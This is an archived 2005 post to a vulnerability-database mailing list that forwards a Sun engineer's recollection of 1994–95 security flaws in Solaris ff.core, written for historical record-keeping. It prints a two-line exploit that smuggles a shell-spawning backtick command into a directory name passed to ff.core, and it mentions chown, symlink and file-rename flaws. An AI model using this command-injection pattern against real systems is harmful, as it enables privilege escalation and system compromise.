[VIM] Re: old Solaris ff.core help =) (fwd)

security curmudgeon jericho at attrition.org
Tue Jun 14 19:13:01 EDT 2005

---------- Forwarded message ----------
From: Casper.Dik at Sun.COM
To: security curmudgeon <jericho at attrition.org>
Cc: Steven Christey <coley at mitre.org>
Date: Wed, 08 Jun 2005 09:48:12 +0200
Subject: Re: old Solaris ff.core help =)

>this post:
>This is one of a few mentions of "two vulnerabilities in ff.core". Based
>on the date, the Aug 30, 1994 IFS would be one of the two, but I can't
>find record of the second beyond the somewhat cryptic 101889 patch notes
>and several mail list posts.
>In short, can you confirm there were two vulnerabilities around 1994/1995
>in ff.core? If so, any hint as to what the second was, or the impact?
>Given the age of the program, I don't think it is letting any serious
>cat out of the bag =) This is purely for a historic perspective on

ff.core was a mess and there were certainly several vulnerabilities
in it; I corresponded a lot about this with Sun and then made sure it was
mostly fixed after I joined Sun.

It used popen/system a lot and allowed you to chown tandom

My old favourite exploit (which I had memorized and could type by hand)
after the initial (botched ) fix was:

      mkdir -p '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`'
      ff.core 0 1 '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`' x

There were some symlink issues and there was the ability to rename
random files.


More information about the VIM mailing list